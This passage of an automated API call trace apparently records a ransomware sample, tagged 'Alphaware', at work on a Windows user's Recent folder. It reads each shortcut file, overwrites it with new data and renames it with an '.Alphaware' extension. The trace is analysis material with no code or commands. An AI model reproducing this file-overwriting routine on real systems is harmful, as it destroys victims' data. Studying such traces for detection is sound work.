nFileSizeLow=0xe9d)) returned 1 [0097.176] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\m66Nad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\m66nad.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.176] ReadFile (in: hFile=0x250, lpBuffer=0x25749a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25749a8*, lpNumberOfBytesRead=0x23e958*=0xe9d, lpOverlapped=0x0) returned 1 [0097.288] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\m66Nad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\m66nad.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.291] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\m66Nad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\m66nad.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf84ae00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf84ae00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c303fc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1448)) returned 1 [0097.291] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\m66Nad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\m66nad.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\m66Nad.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\m66nad.lnk.alphaware")) returned 1 [0097.292] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MADiRK5BENdO7pHH.flv.lnk", dwFileAttributes=0x80) returned 1 [0097.293] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MADiRK5BENdO7pHH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\madirk5bendo7phh.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23fda18 | out: lpFileInformation=0x23fda18*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfc4f320, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc4f320, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfc4f320, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe67)) returned 1 [0097.293] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MADiRK5BENdO7pHH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\madirk5bendo7phh.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.293] ReadFile (in: hFile=0x250, lpBuffer=0x23febb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23febb0*, lpNumberOfBytesRead=0x23e958*=0xe67, lpOverlapped=0x0) returned 1 [0097.314] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MADiRK5BENdO7pHH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\madirk5bendo7phh.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.346] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MADiRK5BENdO7pHH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\madirk5bendo7phh.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc4f320, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc4f320, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c3763e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1408)) returned 1 [0097.347] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MADiRK5BENdO7pHH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\madirk5bendo7phh.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MADiRK5BENdO7pHH.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\madirk5bendo7phh.flv.lnk.alphaware")) returned 1 [0097.348] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk", dwFileAttributes=0x80) returned 1 [0097.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\miklgwo4kuajyz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2487550 | out: lpFileInformation=0x2487550*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1312580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1312580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1312580, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe1c)) returned 1 [0097.348] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\miklgwo4kuajyz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.349] ReadFile (in: hFile=0x250, lpBuffer=0x2488660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2488660*, lpNumberOfBytesRead=0x23e958*=0xe1c, lpOverlapped=0x0) returned 1 [0097.390] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk", nBufferLength=0x105, lpBuffer=0x23e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk", lpFilePart=0x0) returned 0x4e [0097.390] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\miklgwo4kuajyz.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.393] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk", lpFilePart=0x0) returned 0x4e [0097.393] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\miklgwo4kuajyz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1312580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1312580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c3e8800, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13a0)) returned 1 [0097.393] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\miklgwo4kuajyz.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\miKlgwo4kuAJyz.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\miklgwo4kuajyz.lnk.alphaware")) returned 1 [0097.398] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MKqMrJd2GayW Iyftd.ots.lnk", dwFileAttributes=0x80) returned 1 [0097.399] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MKqMrJd2GayW Iyftd.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mkqmrjd2gayw iyftd.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25105e8 | out: lpFileInformation=0x25105e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0fa65e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0fa65e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0fa65e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9ee)) returned 1 [0097.399] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MKqMrJd2GayW Iyftd.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mkqmrjd2gayw iyftd.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.399] ReadFile (in: hFile=0x250, lpBuffer=0x25112f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25112f0*, lpNumberOfBytesRead=0x23e958*=0x9ee, lpOverlapped=0x0) returned 1 [0097.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.496] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MKqMrJd2GayW Iyftd.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mkqmrjd2gayw iyftd.ots.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.497] GetFileType (hFile=0x250) returned 0x1 [0097.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.498] GetFileType (hFile=0x250) returned 0x1 [0097.498] WriteFile (in: hFile=0x250, lpBuffer=0x2594c68*, nNumberOfBytesToWrite=0xe08, lpNumberOfBytesWritten=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x2594c68*, lpNumberOfBytesWritten=0x23e818*=0xe08, lpOverlapped=0x0) returned 1 [0097.499] CloseHandle (hObject=0x250) returned 1 [0097.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MKqMrJd2GayW Iyftd.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mkqmrjd2gayw iyftd.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0fa65e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0fa65e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c4f31a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe08)) returned 1 [0097.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.501] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MKqMrJd2GayW Iyftd.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mkqmrjd2gayw iyftd.ots.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MKqMrJd2GayW Iyftd.ots.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mkqmrjd2gayw iyftd.ots.lnk.alphaware")) returned 1 [0097.502] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk", dwFileAttributes=0x80) returned 1 [0097.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mlvaw3l8e0fmzi-r4q.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2596758 | out: lpFileInformation=0x2596758*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd12ec420, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12ec420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd12ec420, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1337)) returned 1 [0097.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.503] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk", nBufferLength=0x105, lpBuffer=0x23e390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk", lpFilePart=0x0) returned 0x52 [0097.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.503] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mlvaw3l8e0fmzi-r4q.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.503] GetFileType (hFile=0x250) returned 0x1 [0097.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.504] GetFileType (hFile=0x250) returned 0x1 [0097.504] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x1337 [0097.504] ReadFile (in: hFile=0x250, lpBuffer=0x2596a38, nNumberOfBytesToRead=0x1337, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2596a38*, lpNumberOfBytesRead=0x23e958*=0x1337, lpOverlapped=0x0) returned 1 [0097.505] CloseHandle (hObject=0x250) returned 1 [0097.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.541] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mlvaw3l8e0fmzi-r4q.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.542] GetFileType (hFile=0x250) returned 0x1 [0097.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.542] GetFileType (hFile=0x250) returned 0x1 [0097.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.544] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mlvaw3l8e0fmzi-r4q.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12ec420, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12ec420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c5655c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a74)) returned 1 [0097.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.544] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mlvaw3l8e0fmzi-r4q.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mlVaW3l8E0FMzi-R4q.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mlvaw3l8e0fmzi-r4q.lnk.alphaware")) returned 1 [0097.547] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mvpq.lnk", dwFileAttributes=0x80) returned 1 [0097.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.547] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mvpq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mvpq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24226f8 | out: lpFileInformation=0x24226f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfb90c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb90c40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb90c40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x200)) returned 1 [0097.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.548] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mvpq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mvpq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.548] GetFileType (hFile=0x250) returned 0x1 [0097.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.548] GetFileType (hFile=0x250) returned 0x1 [0097.548] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x200 [0097.548] ReadFile (in: hFile=0x250, lpBuffer=0x2422ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2422ba8*, lpNumberOfBytesRead=0x23e958*=0x200, lpOverlapped=0x0) returned 1 [0097.550] CloseHandle (hObject=0x250) returned 1 [0097.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.573] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mvpq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mvpq.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.575] GetFileType (hFile=0x250) returned 0x1 [0097.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.575] GetFileType (hFile=0x250) returned 0x1 [0097.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.576] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mvpq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mvpq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb90c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb90c40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c5b1880, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x388)) returned 1 [0097.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.576] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mvpq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mvpq.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mvpq.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mvpq.lnk.alphaware")) returned 1 [0097.578] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mxWMxpSlb1Z2y3xfhO0.swf.lnk", dwFileAttributes=0x80) returned 1 [0097.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.578] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mxWMxpSlb1Z2y3xfhO0.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mxwmxpslb1z2y3xfho0.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24a3490 | out: lpFileInformation=0x24a3490*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfc03060, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc03060, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfc03060, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x24f)) returned 1 [0097.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.579] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mxWMxpSlb1Z2y3xfhO0.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mxwmxpslb1z2y3xfho0.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.579] GetFileType (hFile=0x250) returned 0x1 [0097.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.579] GetFileType (hFile=0x250) returned 0x1 [0097.579] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x24f [0097.579] ReadFile (in: hFile=0x250, lpBuffer=0x24a39f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24a39f8*, lpNumberOfBytesRead=0x23e958*=0x24f, lpOverlapped=0x0) returned 1 [0097.580] CloseHandle (hObject=0x250) returned 1 [0097.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.604] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mxWMxpSlb1Z2y3xfhO0.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mxwmxpslb1z2y3xfho0.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.605] GetFileType (hFile=0x250) returned 0x1 [0097.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.605] GetFileType (hFile=0x250) returned 0x1 [0097.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.607] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mxWMxpSlb1Z2y3xfhO0.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mxwmxpslb1z2y3xfho0.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc03060, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc03060, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c5fdb40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0)) returned 1 [0097.607] SetThreadErrorMode 